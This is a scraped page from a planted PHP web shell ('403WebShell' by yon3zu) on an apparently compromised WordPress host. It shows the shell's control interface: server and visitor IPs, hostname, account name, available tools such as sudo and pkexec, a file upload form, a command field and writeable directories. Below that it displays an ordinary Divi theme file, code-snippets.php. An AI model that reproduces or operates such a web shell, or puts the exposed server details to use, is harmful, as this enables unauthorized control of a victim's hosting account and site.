404 Not Found


nginx
403WebShell
403Webshell
Server IP : 85.187.128.60  /  Your IP : 216.73.217.71
Web Server : LiteSpeed
System : Linux sg1-ts103.a2hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : homeliho ( 1690)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/homeliho/homepu.house/wp-content/themes/Divi/core/code-snippets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/homeliho/homepu.house/wp-content/themes/Divi/core/code-snippets/code-snippets.php
<?php
/**
 * Code snippets quick feature entry file.
 *
 * Divi Cloud Code Snippets
 *
 * @link https://github.com/elegantthemes/Divi/issues/26232
 *
 * @package Divi
 * @subpackage Core
 * @since 4.19.0
 */

if ( ! defined( 'ET_CODE_SNIPPETS_DIR' ) ) {
	define( 'ET_CODE_SNIPPETS_DIR', ET_CORE_PATH . 'code-snippets/' );
}

require_once trailingslashit( ET_CODE_SNIPPETS_DIR ) . 'constants.php';
require_once trailingslashit( ET_CODE_SNIPPETS_DIR ) . 'code-snippets-library.php';
require_once trailingslashit( ET_CODE_SNIPPETS_DIR ) . 'api.php';

if ( ! function_exists( 'et_init_code_snippets_library' ) ) :
	/**
	 * Init Code Snippets Library.
	 *
	 * Class `ET_Builder_Post_Taxonomy_LayoutCategory` must be initalized
	 * before `ET_Builder_Code_Snippets_Library` because of the internal dependency.
	 *
	 * Since `ET_Builder_Post_Taxonomy_LayoutCategory is initialized using
	 * `add_action( 'init', 'et_setup_builder', 0 );`,
	 *
	 * We initialize `ET_Builder_Code_Snippets_Library` using
	 * `add_action( 'init', 'et_init_code_snippets_library', 10 );`
	 *
	 * @return void
	 */
	function et_init_code_snippets_library() {
		require_once trailingslashit( ET_CODE_SNIPPETS_DIR ) . 'CodeSnippetsLibrary.php';
	}
endif;

add_action( 'init', 'et_init_code_snippets_library' );

Youez - 2016 - github.com/yon3zu
LinuXploit